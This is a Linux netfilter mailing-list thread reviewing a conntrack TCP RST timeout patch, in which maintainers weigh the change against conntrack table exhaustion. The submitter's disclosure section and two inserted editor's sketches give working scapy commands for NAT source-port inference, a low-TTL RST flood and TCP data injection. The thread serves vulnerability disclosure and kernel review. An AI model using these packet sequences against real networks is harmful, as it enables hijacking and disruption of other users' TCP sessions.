Message ID | 20240705040013.29860-1-979093444@qq.com |
---|---|
State | Under Review |
Series | netfilter: conntrack: tcp: do not lower timeout to CLOSE for in-window RSTs |
yyxRoy <yyxroy22@gmail.com> wrote:
> With previous commit https://github.com/torvalds/linux/commit/be0502a
> ("netfilter: conntrack: tcp: only close if RST matches exact sequence")
> to fight against TCP in-window reset attacks, the current version of netfilter
> will keep the connection state in ESTABLISHED, but lower the timeout to
> that of CLOSE (10 seconds by default) for in-window TCP RSTs, and wait for
> the peer to send a challenge ACK to restore the connection timeout
> (5 mins in tests).
>
> However, malicious attackers can prevent challenge ACKs from being elicited by
> manipulating the TTL value of RSTs. The attacker can probe the TTL value
> between the NAT device and itself and send in-window RST packets with
> a TTL value that is decremented to 0 after arriving at the NAT device.
> This causes the packet to be dropped rather than forwarded to the
> internal client, thus preventing a challenge ACK from being triggered.
> As the window of the sequence number is quite large (bigger than 60,000
> in tests) and the sequence number is 32-bit, the attacker only needs to
> send nearly 60,000 RST packets with different sequence numbers
> (i.e., 1, 60001, 120001, and so on) and one of them will definitely
> fall within the window.
>
> Therefore we can't simply lower the connection timeout to 10 seconds
> (rather short) upon receiving in-window RSTs. With this patch, netfilter
> will lower the connection timeout to that of CLOSE only when it receives
> RSTs with exact sequence numbers (i.e., old_state != new_state).

This effectively ignores most RST packets, which will clog up the
conntrack table (the established timeout is 5 days).

I don't think there is anything sensible that we can do here.

Also, one can send a train with a data packet + RST and we will hit
the immediate-close conditional:

	/* Check if rst is part of train, such as
	 *   foo:80 > bar:4379: P, 235946583:235946602(19) ack 42
	 *   foo:80 > bar:4379: R, 235946602:235946602(0) ack 42
	 */
	if (ct->proto.tcp.last_index == TCP_ACK_SET &&
	    ct->proto.tcp.last_dir == dir &&
	    seq == ct->proto.tcp.last_end)
		break;

So even if we'd make this change it doesn't prevent remote induced
resets.

Conntrack cannot validate RSTs precisely due to lack of information;
only the endpoints can do this.
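[Editor's note: for illustration, a hypothetical scapy sketch of the "data packet + RST train" described above. The addresses, ports, sequence numbers and payload are made up; the only point is that the RST's sequence number equals the end of the preceding data segment, which is what the ct->proto.tcp.last_end check above matches.]

    from scapy.all import IP, TCP, Raw, send

    src, dst = "192.0.2.1", "198.51.100.1"   # example addresses (RFC 5737)
    sport, dport = 80, 4379
    seq, ack = 235946583, 42
    payload = b"x" * 19

    # Data segment: foo:80 > bar:4379: P, 235946583:235946602(19) ack 42
    send(IP(src=src, dst=dst) /
         TCP(sport=sport, dport=dport, flags="PA", seq=seq, ack=ack) /
         Raw(payload))

    # RST immediately following the data: R, 235946602:235946602(0) ack 42
    send(IP(src=src, dst=dst) /
         TCP(sport=sport, dport=dport, flags="R", seq=seq + len(payload), ack=ack))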
On Fri, 5 Jul 2024, Florian Westphal wrote:

> yyxRoy <yyxroy22@gmail.com> wrote:
> > With previous commit https://github.com/torvalds/linux/commit/be0502a
> > ("netfilter: conntrack: tcp: only close if RST matches exact sequence")
> > to fight against TCP in-window reset attacks, the current version of netfilter
> > will keep the connection state in ESTABLISHED, but lower the timeout to
> > that of CLOSE (10 seconds by default) for in-window TCP RSTs, and wait for
> > the peer to send a challenge ACK to restore the connection timeout
> > (5 mins in tests).
> >
> > However, malicious attackers can prevent challenge ACKs from being elicited by
> > manipulating the TTL value of RSTs. The attacker can probe the TTL value
> > between the NAT device and itself and send in-window RST packets with
> > a TTL value that is decremented to 0 after arriving at the NAT device.
> > This causes the packet to be dropped rather than forwarded to the
> > internal client, thus preventing a challenge ACK from being triggered.
> > As the window of the sequence number is quite large (bigger than 60,000
> > in tests) and the sequence number is 32-bit, the attacker only needs to
> > send nearly 60,000 RST packets with different sequence numbers
> > (i.e., 1, 60001, 120001, and so on) and one of them will definitely
> > fall within the window.
> >
> > Therefore we can't simply lower the connection timeout to 10 seconds
> > (rather short) upon receiving in-window RSTs. With this patch, netfilter
> > will lower the connection timeout to that of CLOSE only when it receives
> > RSTs with exact sequence numbers (i.e., old_state != new_state).
>
> This effectively ignores most RST packets, which will clog up the
> conntrack table (the established timeout is 5 days).
>
> I don't think there is anything sensible that we can do here.
>
> Also, one can send a train with a data packet + RST and we will hit
> the immediate-close conditional:
>
> 	/* Check if rst is part of train, such as
> 	 *   foo:80 > bar:4379: P, 235946583:235946602(19) ack 42
> 	 *   foo:80 > bar:4379: R, 235946602:235946602(0) ack 42
> 	 */
> 	if (ct->proto.tcp.last_index == TCP_ACK_SET &&
> 	    ct->proto.tcp.last_dir == dir &&
> 	    seq == ct->proto.tcp.last_end)
> 		break;
>
> So even if we'd make this change it doesn't prevent remote induced
> resets.
>
> Conntrack cannot validate RSTs precisely due to lack of information;
> only the endpoints can do this.

I fully agree with Florian: conntrack plays the role of a middlebox and
cannot absolutely know the right seq/ack numbers of the client/server
sides. Add NAT on top of that and there are a couple of ways to attack a
given traffic flow. I don't see a way in which the checks/parameters could
be tightened without blocking real traffic.

Best regards,
Jozsef
Jozsef Kadlecsik <kadlec@blackhole.kfki.hu> wrote:
> I fully agree with Florian: conntrack plays the role of a middlebox and
> cannot absolutely know the right seq/ack numbers of the client/server
> sides. Add NAT on top of that and there are a couple of ways to attack a
> given traffic flow. I don't see a way in which the checks/parameters could
> be tightened without blocking real traffic.

I forgot about TCP timestamps, which we do not track at the moment.

But then there is a slight caveat: if one side exits, the RST won't carry
the timestamp option, so even keeping track of timestamps won't help :-(
On Fri, 5 Jul 2024 at 17:43, Florian Westphal <fw@strlen.de> wrote:
> Also, one can send a train with a data packet + RST and we will hit
> the immediate-close conditional:
>
> 	/* Check if rst is part of train, such as
> 	 *   foo:80 > bar:4379: P, 235946583:235946602(19) ack 42
> 	 *   foo:80 > bar:4379: R, 235946602:235946602(0) ack 42
> 	 */
> 	if (ct->proto.tcp.last_index == TCP_ACK_SET &&
> 	    ct->proto.tcp.last_dir == dir &&
> 	    seq == ct->proto.tcp.last_end)
> 		break;
>
> So even if we'd make this change it doesn't prevent remote induced
> resets.

Thank you for your time and prompt reply, and for bringing to my attention the
case I had overlooked. I acknowledge that, as a middlebox, Netfilter faces
significant challenges in accurately determining the correct sequence and
acknowledgment numbers. However, it is crucial to consider the security
implications as well.

For instance, previously, an in-window RST could switch the mapping to the
CLOSE state with a mere 10-second timeout. The recent patch
("netfilter: conntrack: tcp: only close if RST matches exact sequence")
aimed to improve security by keeping the mapping in the ESTABLISHED state
and extending the timeout to 300 seconds upon receiving a challenge ACK.

However, this patch's efforts are still insufficient to completely prevent
attacks. As I mentioned, attackers can manipulate the TTL to prevent the peer
from responding with a challenge ACK, thereby reverting the mapping to the
10-second timeout. This duration is quite short and potentially dangerous,
enabling various attacks, including TCP hijacking (I have included a detailed
report on potential attacks below, if time permits).

	else if (unlikely(index == TCP_RST_SET))
		timeout = timeouts[TCP_CONNTRACK_CLOSE];

The problem is that current netfilter only checks whether the packet has the
RST flag set (index == TCP_RST_SET) and lowers the timeout to that of CLOSE
(10 seconds only). I strongly recommend implementing measures to prevent such
vulnerabilities. For example, in the case of an in-window RST, could we
consider lowering the timeout to 300 seconds, or something similar?

Thank you for considering these points. Once again, thank you for your time
and efforts in enhancing the community's security and usability.

Best regards,
Yuxiang

*******************************************************************************

Here is a case study illustrating how a 10-second timeout can lead to a TCP
hijacking attack, in case you are interested. I hope it won't waste your time
and effort. Additionally, I hope the plain-text format will clearly explain
the situation.

** General Disclosure: Linux Netfilter's Vulnerability of Lacking Sufficient
TCP Sequence Number Validation

1. Threat model

Figure 1 shows the threat model of the TCP hijacking attack. The victim client
behind a Linux box with Netfilter enabled connects to the remote victim server
using TCP to access online services. There is a malicious inside attacker in
the same LAN, such as in Wi-Fi or VPN NAT scenarios. The attacker also controls
a machine capable of IP spoofing on the Internet. The malicious attacker in the
LAN can hijack the TCP session between another client and the remote server,
thereby terminating the original TCP connection or injecting forged messages
into the connection, which may lead to denial-of-service attacks or privacy
leakage attacks.
        victim-client                       remote-server
              \                                  /
               \                                /
                \                              /
           ---------- NAT device with Netfilter ----------
                /                              \
               /                                \
              /                                  \
        local-attacker                  IP-spoofable-machine
                                    (controlled by the attacker)

        Fig 1. Threat model of the TCP hijacking attack.

2. Experiment Setup

We will take VPN scenarios as the example case in this disclosure. We created a
test environment as shown in Fig. 2. The machines are all equipped with Ubuntu
22.04 running the Linux kernel. We configured the NAT device as the VPN server
with OpenVPN, and the client and attacker connect to it with OpenVPN. The
victim client establishes a TCP connection with the remote server (such as an
SSH connection or accessing web pages). Here we take a simple TCP connection as
an example, in which the client and server run the netcat program to establish
a connection as follows.

   vpn-client (tun0:10.8.0.3)          remote-server (eth0:43.159.39.110)
              \                                  /
               \                                /
                \                              /
        ---- (tun0:10.8.0.1) vpn server (eth0:43.163.229.240) ----
                /                              \
               /                                \
              /                                  \
   local-attacker (tun0:10.8.0.2)        IP-spoofable-machine
                                    (controlled by the attacker)

        Fig 2. Testing environment.

The server starts the netcat service and listens on port 80.
------------------
remote-server@remote-server:~$ sudo nc -l -p 80
hello,i'm client
HELLO,I'M SERVER
------------------

The victim establishes a TCP connection with source port 40000.
------------------
victim-client@victim-client:~$ nc 43.159.39.110 80 -p 40000
hello,i'm client
HELLO,I'M SERVER
------------------

There will be a corresponding NAT mapping recorded by Netfilter as follows:
------------------
VPN-server@VPN-server:~$ sudo conntrack -L | grep 43.159.39.110
tcp      6 431973 ESTABLISHED src=10.8.0.3 dst=43.159.39.110 sport=40000 dport=80 src=43.159.39.110 dst=10.203.0.5 sport=80 dport=40000 [ASSURED] mark=0 use=1
------------------

3. Attack Steps

3.1 In the first step, the attacker infers the TCP source port used by the
victim.

(1) The attacker constructs a SYN packet from itself to the server with a
guessed source port m. In most cases, the attacker cannot guess the right
source port. For example, m is 50000.
------------------
local-attacker@local-attacker:~$ sudo scapy
>>> send(IP(src="10.8.0.2",dst="43.159.39.110",ttl=2)/TCP(seq=1,ack=1,sport=50000,dport=80,flags="S"),iface="tun0")
------------------

Netfilter will create a new NAT mapping to record the session, as follows:
------------------
VPN-server@VPN-server:~$ sudo conntrack -L | grep 43.159.39.110
tcp      6 431841 ESTABLISHED src=10.8.0.3 dst=43.159.39.110 sport=40000 dport=80 src=43.159.39.110 dst=10.203.0.5 sport=80 dport=40000 [ASSURED] mark=0 use=1
tcp      6 115 SYN_SENT src=10.8.0.2 dst=43.159.39.110 sport=50000 dport=80 [UNREPLIED] src=43.159.39.110 dst=10.203.0.5 sport=80 dport=50000 mark=0 use=1
------------------

Then the attacker can control its spoofing machine to send a spoofed SYN/ACK
packet, pretending to be the server, to the NAT device's external IP address
with the guessed port, in order to verify it.
------------------
spoofable-machine@spoofable-machine:~$ sudo scapy
>>> send(IP(src="43.159.39.110",dst="43.163.229.240")/TCP(seq=1,ack=1,sport=80,dport=50000,flags="SA"))
------------------

In this case, the SYN/ACK packet will be forwarded to the attacker, as it
matches the second (the attacker's own) NAT mapping.
------------------
local-attacker@local-attacker:~$ sudo tcpdump -i any -nSvvv host 43.159.39.110
16:20:31.073779 tun0 Out IP (tos 0x0, ttl 2, id 1, offset 0, flags [none], proto TCP (6), length 40)
    10.8.0.2.50000 > 43.159.39.110.80: Flags [S], cksum 0x6f29 (correct), seq 1, win 8192, length 0
16:22:11.608374 tun0 In IP (tos 0x64, ttl 54, id 1, offset 0, flags [none], proto TCP (6), length 40)
    43.159.39.110.80 > 10.8.0.2.50000: Flags [S.], cksum 0x6f19 (correct), seq 1, ack 1, win 8192, length 0
------------------

(2) However, when the attacker guesses the right source port (i.e., 40000) and
sends the SYN packet:
------------------
local-attacker@local-attacker:~$ sudo scapy
>>> send(IP(src="10.8.0.2",dst="43.159.39.110",ttl=2)/TCP(seq=1,ack=1,sport=40000,dport=80,flags="S"),iface="tun0")
------------------

Netfilter will translate it to another random source port to deal with the port
collision. For example, it chooses 63503, and the NAT mappings are as follows:
------------------
VPN-server@VPN-server:~$ sudo conntrack -L | grep 43.159.39.110
tcp      6 431841 ESTABLISHED src=10.8.0.3 dst=43.159.39.110 sport=40000 dport=80 src=43.159.39.110 dst=10.203.0.5 sport=80 dport=40000 [ASSURED] mark=0 use=1
tcp      6 114 SYN_SENT src=10.8.0.2 dst=43.159.39.110 sport=40000 dport=80 [UNREPLIED] src=43.159.39.110 dst=10.203.0.5 sport=80 dport=63503 mark=0 use=1
------------------

Then the attacker controls its spoofing machine to send the verification
SYN/ACK packet with the guessed port 40000.
------------------
spoofable-machine@spoofable-machine:~$ sudo scapy
>>> send(IP(src="43.159.39.110",dst="43.163.229.240")/TCP(seq=1,ack=1,sport=80,dport=40000,flags="SA"))
------------------

However, this time it will be forwarded to the victim client instead of the
attacker, as it matches the first NAT mapping.

Finally, the attacker can find the source port used by the victim device by
traversing the entire space of possible source ports, using the above-mentioned
difference between guessing the source port correctly and wrongly, i.e.,
whether or not it receives the spoofed SYN/ACK packet.

3.2 In the second step, the attacker intercepts messages of the victim's
current TCP connection to obtain the accurate sequence and acknowledgment
numbers.

(1) Since the current version of Netfilter does not check the sequence number
strictly, an RST packet with an in-window sequence number can cause a change of
the mapping state. With the previous patch
(https://github.com/torvalds/linux/commit/be0502a3f2e94211a8809a09ecbc3a017189b8fb)
to fight against blind TCP reset attacks, instead of directly transferring the
state of the NAT mapping to CLOSE with a 10-second timeout, the mapping stays
in the ESTABLISHED state, but the timeout is still decreased to 10 seconds. As
the in-window RST will trigger the endpoint to respond with a challenge ACK
packet, the timeout of the mapping will then be updated to 300 seconds.

However, we find that this update of the timeout can be bypassed by the
malicious attacker. The attacker can probe the TTL value between the NAT device
and the spoofing machine and send an in-window RST packet with a TTL value that
is decremented to 0 after arriving at the NAT device; thus it will be dropped
rather than forwarded to the victim client, and no challenge ACK will be
triggered.
Besides, as the window of the sequence number is quite large (bigger than
60,000 in our test) and the sequence number is 32-bit, the attacker only needs
to send nearly 60,000 RST packets with different sequence numbers (i.e., 1,
60001, 120001, and so on) and one of them will definitely fall within the
window.
------------------
spoofable-machine@spoofable-machine:~$ sudo scapy
>>> send(IP(src="43.159.39.110",dst="43.163.229.240",ttl=10)/TCP(seq=1319804841+60000,ack=1,sport=80,dport=40000,flags="R"))
------------------

It only takes a rather short time (nearly 1-2 seconds) for current machines to
send 60,000 RST packets. In this way, the NAT mapping will be quickly cleared
after the RST packets.
------------------
VPN-server@VPN-server:~$ sudo conntrack -L | grep 43.159.39.110
tcp      6 431841 ESTABLISHED src=10.8.0.3 dst=43.159.39.110 sport=40000 dport=80 src=43.159.39.110 dst=10.203.0.5 sport=80 dport=40000 [ASSURED] mark=0 use=1
VPN-server@VPN-server:~$ ##### After RST
VPN-server@VPN-server:~$ sudo conntrack -L | grep 43.159.39.110
tcp      6 10 ESTABLISHED src=10.8.0.3 dst=43.159.39.110 sport=40000 dport=80 src=43.159.39.110 dst=10.203.0.5 sport=80 dport=40000 [ASSURED] mark=0 use=1
VPN-server@VPN-server:~$ ##### After 10 seconds
VPN-server@VPN-server:~$ sudo conntrack -L | grep 43.159.39.110
tcp      6 0 ESTABLISHED src=10.8.0.3 dst=43.159.39.110 sport=40000 dport=80 src=43.159.39.110 dst=10.203.0.5 sport=80 dport=40000 [ASSURED] mark=0 use=1
VPN-server@VPN-server:~$ ##### After that
VPN-server@VPN-server:~$ sudo conntrack -L | grep 43.159.39.110
------------------

(2) After the NAT mapping disappears, the attacker constructs a TCP data packet
to the server. After NAT, it looks the same as those sent from the victim
client. The server will respond with an ACK packet, which contains the correct
sequence and acknowledgment numbers, as shown below:
------------------
local-attacker@local-attacker:~$ sudo scapy
>>> send(IP(src="10.8.0.2",dst="43.159.39.110")/TCP(seq=1,ack=1,sport=40000,dport=80,flags="PA"),iface="tun0")
local-attacker@local-attacker:~$ sudo tcpdump -i any -nSvvv host 43.159.39.110
16:44:21.141636 tun0 Out IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto TCP (6), length 40)
    10.8.0.2.40000 > 43.159.39.110.80: Flags [P.], cksum 0x9623 (correct), seq 1, ack 1, win 8192, length 0
16:44:21.255077 tun0 In IP (tos 0x64, ttl 54, id 20259, offset 0, flags [DF], proto TCP (6), length 52)
    43.159.39.110.80 > 10.8.0.2.40000: Flags [.], cksum 0x651c (correct), seq 1319804847, ack 684909974, win 509, options [nop,nop,TS val 1722395496 ecr 995347412], length 0
------------------

3.3 In the third step, the attacker can use the obtained source port, sequence
number, acknowledgment number, etc. to send an RST packet to terminate the
original TCP connection (such as an SSH session), to inject fake messages into
the original TCP connection to manipulate the session (such as web HTTP pages),
or to send requests to the server.
------------------
local-attacker@local-attacker:~$ sudo scapy
>>> send(IP(src="10.8.0.2",dst="43.159.39.110")/TCP(seq=684909974,ack=1319804847,sport=40000,dport=80,flags="PA")/"You are hijacked, send me money",iface="tun0")
------------------

On the server machine, the spoofed message is accepted, as the sequence and
acknowledgment numbers are right.
------------------
remote-server@remote-server:~$ sudo nc -l -p 80
hello,i'm client
HELLO,I'M SERVER
You are hijacked, send me money
------------------
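[Editor's note: for illustration, a hypothetical scapy sketch of the low-TTL in-window RST flood from step 3.2. The addresses and port are taken from the testing environment above; the TTL value, step size and loop bounds are assumptions, not the exact script used in the experiments.]

    from scapy.all import IP, TCP, send

    server_ip = "43.159.39.110"      # remote server (spoofed source)
    nat_ext_ip = "43.163.229.240"    # NAT device's external address
    victim_port = 40000              # external port learned in step 3.1
    ttl_to_nat = 10                  # chosen so the packet expires just past the NAT box
    step = 60000                     # smaller than the observed receive window

    # Sweep the 32-bit sequence space in window-sized steps; one of these
    # RSTs is guaranteed to land inside the current receive window.
    for i in range(2**32 // step + 1):
        send(IP(src=server_ip, dst=nat_ext_ip, ttl=ttl_to_nat) /
             TCP(sport=80, dport=victim_port, flags="R", seq=(i * step) % 2**32),
             verbose=False)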
yyxRoy <yyxroy22@gmail.com> wrote:
> On Fri, 5 Jul 2024 at 17:43, Florian Westphal <fw@strlen.de> wrote:
> > Also, one can send a train with a data packet + RST and we will hit
> > the immediate-close conditional:
> >
> > 	/* Check if rst is part of train, such as
> > 	 *   foo:80 > bar:4379: P, 235946583:235946602(19) ack 42
> > 	 *   foo:80 > bar:4379: R, 235946602:235946602(0) ack 42
> > 	 */
> > 	if (ct->proto.tcp.last_index == TCP_ACK_SET &&
> > 	    ct->proto.tcp.last_dir == dir &&
> > 	    seq == ct->proto.tcp.last_end)
> > 		break;
> >
> > So even if we'd make this change it doesn't prevent remote induced
> > resets.
>
> Thank you for your time and prompt reply, and for bringing to my attention the
> case I had overlooked. I acknowledge that, as a middlebox, Netfilter faces
> significant challenges in accurately determining the correct sequence and
> acknowledgment numbers. However, it is crucial to consider the security
> implications as well.

Yes, but we have to make do with the information we have (or can observe),
and we have to trade this off against occupancy of the conntrack table.

> For instance, previously, an in-window RST could switch the mapping to the
> CLOSE state with a mere 10-second timeout. The recent patch
> ("netfilter: conntrack: tcp: only close if RST matches exact sequence")
> aimed to improve security by keeping the mapping in the ESTABLISHED state
> and extending the timeout to 300 seconds upon receiving a challenge ACK.

be0502a3f2e9 ("netfilter: conntrack: tcp: only close if RST matches exact
sequence")?

Yes, that is a side effect. It was about preventing a NAT mapping from going
away because of an RST packet coming from an unrelated previous connection
(Carrier-Grade NAT makes this more likely, unfortunately).

I don't know how to prevent it for RST flooding with known address/port pairs.

> However, this patch's efforts are still insufficient to completely prevent
> attacks. As I mentioned, attackers can manipulate the TTL to prevent the peer
> from responding with a challenge ACK, thereby reverting the mapping to the
> 10-second timeout. This duration is quite short and potentially dangerous,
> enabling various attacks, including TCP hijacking (I have included a detailed
> report on potential attacks below, if time permits).
>
> 	else if (unlikely(index == TCP_RST_SET))
> 		timeout = timeouts[TCP_CONNTRACK_CLOSE];
>
> The problem is that current netfilter only checks whether the packet has the
> RST flag set (index == TCP_RST_SET) and lowers the timeout to that of CLOSE
> (10 seconds only). I strongly recommend implementing measures to prevent such
> vulnerabilities.

I don't know how.

We can track TTL/NH.
We can track TCP timestamps.

But how would we use such extra information?
E.g. what if we observe:

ACK, TTL 32
ACK, TTL 31
ACK, TTL 30
ACK, TTL 29
...

will we just refuse to update the TTL?
If we reduce it, any attacker can shrink it to the needed low value
to prevent a later RST from reaching the end host.

If we don't, could the connection get stuck on a legitimate route change?
What about malicious entities injecting FIN/SYN packets rather than RSTs?

If we have the last ts.echo from the remote side, we can make it harder, but
what do we do if the RST doesn't carry a timestamp?

That could be perfectly legal when a machine lost state, e.g. was power-cycled.
So we can't ignore such RSTs.

> For example, in the case of an in-window RST, could we consider lowering
> the timeout to 300 seconds, or something similar?

Yes, but I don't see how it helps. An attacker can prepend a data packet and
we'd still move to close.
And I don't really want to change that because it helps to get rid of stale
connections with real/normal traffic.

I'm worried that adding cases where we do not act on RSTs will cause the
conntrack table to fill up.
On Mon, 8 Jul 2024 at 22:12, Florian Westphal <fw@strlen.de> wrote:
> We can track TTL/NH.
> We can track TCP timestamps.
>
> But how would we use such extra information?
> E.g. what if we observe:
>
> ACK, TTL 32
> ACK, TTL 31
> ACK, TTL 30
> ACK, TTL 29
> ...
>
> will we just refuse to update the TTL?
> If we reduce it, any attacker can shrink it to the needed low value
> to prevent a later RST from reaching the end host.
>
> If we don't, could the connection get stuck on a legitimate route change?
> What about malicious entities injecting FIN/SYN packets rather than RSTs?
>
> If we have the last ts.echo from the remote side, we can make it harder, but
> what do we do if the RST doesn't carry a timestamp?
>
> That could be perfectly legal when a machine lost state, e.g. was power-cycled.
> So we can't ignore such RSTs.

I fully agree with your considerations. There are indeed some challenges with
the proposed methods of enhancing the checks on in-window sequence numbers,
TTL, and timestamps of RSTs.

However, we now know that conntrack may be vulnerable to attacks and illegal
state transitions when it receives in-window RSTs with a crafted TTL, or data
packets + RSTs. Is it possible to find better methods to mitigate these issues,
as they may pose threats to Netfilter users?

Note: We have also tested other connection tracking frameworks (such as
FreeBSD/OpenBSD PF). Also playing the role of middleboxes, they only change the
state of the connection when they receive an RST with the currently known
precise sequence number, thus avoiding these attacks. Could Netfilter adopt
similar measures, or others, to further mitigate these issues?

Thank you again for your time and for your efforts in maintaining the
community's performance and security!
Hi,

On Wed, 10 Jul 2024, yyxRoy wrote:
> On Mon, 8 Jul 2024 at 22:12, Florian Westphal <fw@strlen.de> wrote:
>> We can track TTL/NH.
>> We can track TCP timestamps.
>>
>> But how would we use such extra information?
>> E.g. what if we observe:
>>
>> ACK, TTL 32
>> ACK, TTL 31
>> ACK, TTL 30
>> ACK, TTL 29
>> ...
>>
>> will we just refuse to update the TTL?
>> If we reduce it, any attacker can shrink it to the needed low value
>> to prevent a later RST from reaching the end host.
>>
>> If we don't, could the connection get stuck on a legitimate route change?
>> What about malicious entities injecting FIN/SYN packets rather than RSTs?
>>
>> If we have the last ts.echo from the remote side, we can make it harder, but
>> what do we do if the RST doesn't carry a timestamp?
>>
>> That could be perfectly legal when a machine lost state, e.g. was power-cycled.
>> So we can't ignore such RSTs.
>
> I fully agree with your considerations. There are indeed some challenges
> with the proposed methods of enhancing the checks on in-window sequence
> numbers, TTL, and timestamps of RSTs.

Your original suggestion was "Verify the sequence numbers of TCP packets
strictly and do not change the timeout of the NAT mapping for an in-window
RST packet."

Please note, you should demonstrate that such a mitigation

- does not prevent (from the conntrack point of view) currently
  handled/properly closed traffic from being handled with the mitigation as
  well,
- does not make exhaustion of the conntrack table easier, i.e. does not create
  an easier DoS vulnerability against it.

> However, we now know that conntrack may be vulnerable to attacks and illegal
> state transitions when it receives in-window RSTs with a crafted TTL, or data
> packets + RSTs. Is it possible to find better methods to mitigate these
> issues, as they may pose threats to Netfilter users?

The attack requires exhaustive port scanning. That can be prevented with
proper firewall rules.

> Note: We have also tested other connection tracking frameworks (such as
> FreeBSD/OpenBSD PF). Also playing the role of middleboxes, they only change
> the state of the connection when they receive an RST with the currently known
> precise sequence number, thus avoiding these attacks. Could Netfilter adopt
> similar measures, or others, to further mitigate these issues?

I find it really strange that those frameworks would match only the exact SEQ
of the RST packets.

Best regards,
Jozsef
diff --git a/net/netfilter/nf_conntrack_proto_tcp.c b/net/netfilter/nf_conntrack_proto_tcp.c
index ae493599a..d06259407 100644
--- a/net/netfilter/nf_conntrack_proto_tcp.c
+++ b/net/netfilter/nf_conntrack_proto_tcp.c
@@ -1280,7 +1280,8 @@ int nf_conntrack_tcp_packet(struct nf_conn *ct,
 	if (ct->proto.tcp.retrans >= tn->tcp_max_retrans &&
 	    timeouts[new_state] > timeouts[TCP_CONNTRACK_RETRANS])
 		timeout = timeouts[TCP_CONNTRACK_RETRANS];
-	else if (unlikely(index == TCP_RST_SET))
+	else if (unlikely(index == TCP_RST_SET) &&
+		 old_state != new_state)
 		timeout = timeouts[TCP_CONNTRACK_CLOSE];
 	else if ((ct->proto.tcp.seen[0].flags | ct->proto.tcp.seen[1].flags) &
 		 IP_CT_TCP_FLAG_DATA_UNACKNOWLEDGED &&
With previous commit https://github.com/torvalds/linux/commit/be0502a
("netfilter: conntrack: tcp: only close if RST matches exact sequence")
to fight against TCP in-window reset attacks, the current version of netfilter
will keep the connection state in ESTABLISHED, but lower the timeout to
that of CLOSE (10 seconds by default) for in-window TCP RSTs, and wait for
the peer to send a challenge ACK to restore the connection timeout
(5 mins in tests).

However, malicious attackers can prevent challenge ACKs from being elicited by
manipulating the TTL value of RSTs. The attacker can probe the TTL value
between the NAT device and itself and send in-window RST packets with
a TTL value that is decremented to 0 after arriving at the NAT device.
This causes the packet to be dropped rather than forwarded to the
internal client, thus preventing a challenge ACK from being triggered.
As the window of the sequence number is quite large (bigger than 60,000
in tests) and the sequence number is 32-bit, the attacker only needs to
send nearly 60,000 RST packets with different sequence numbers
(i.e., 1, 60001, 120001, and so on) and one of them will definitely
fall within the window.

Therefore we can't simply lower the connection timeout to 10 seconds
(rather short) upon receiving in-window RSTs. With this patch, netfilter
will lower the connection timeout to that of CLOSE only when it receives
RSTs with exact sequence numbers (i.e., old_state != new_state).

Signed-off-by: yyxRoy <979093444@qq.com>
---
 net/netfilter/nf_conntrack_proto_tcp.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
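[Editor's note: a simplified Python model of the timeout decision the one-line change above affects. This is an editorial sketch, not kernel code; the timeout values are the documented defaults (5 days for ESTABLISHED, 10 seconds for CLOSE), and the state names stand in for the conntrack state machine.]

    # Simplified model: "old_state != new_state" is true for an exact-sequence
    # RST (the tracker moves ESTABLISHED -> CLOSE) and false for a merely
    # in-window RST (the state is kept).
    TIMEOUTS = {"ESTABLISHED": 5 * 24 * 3600, "CLOSE": 10}  # seconds

    def rst_timeout(old_state, new_state, current_timeout, patched):
        """Return the timeout applied after an RST is seen (simplified)."""
        if not patched:
            # current behaviour: any RST lowers the timeout to that of CLOSE
            return TIMEOUTS["CLOSE"]
        # patched behaviour: lower it only when the RST actually changed the state
        return TIMEOUTS["CLOSE"] if old_state != new_state else current_timeout

    # exact-sequence RST: ESTABLISHED -> CLOSE, both variants give 10 s
    print(rst_timeout("ESTABLISHED", "CLOSE", TIMEOUTS["ESTABLISHED"], patched=True))         # 10
    # merely in-window RST: unpatched drops to 10 s, patched keeps the existing timeout
    print(rst_timeout("ESTABLISHED", "ESTABLISHED", TIMEOUTS["ESTABLISHED"], patched=False))  # 10
    print(rst_timeout("ESTABLISHED", "ESTABLISHED", TIMEOUTS["ESTABLISHED"], patched=True))   # 432000

With the change, an in-window but non-exact RST leaves the mapping's existing timeout untouched, which is exactly the behaviour Florian objects to above: unacknowledged RSTs could then keep entries alive for up to the full ESTABLISHED timeout.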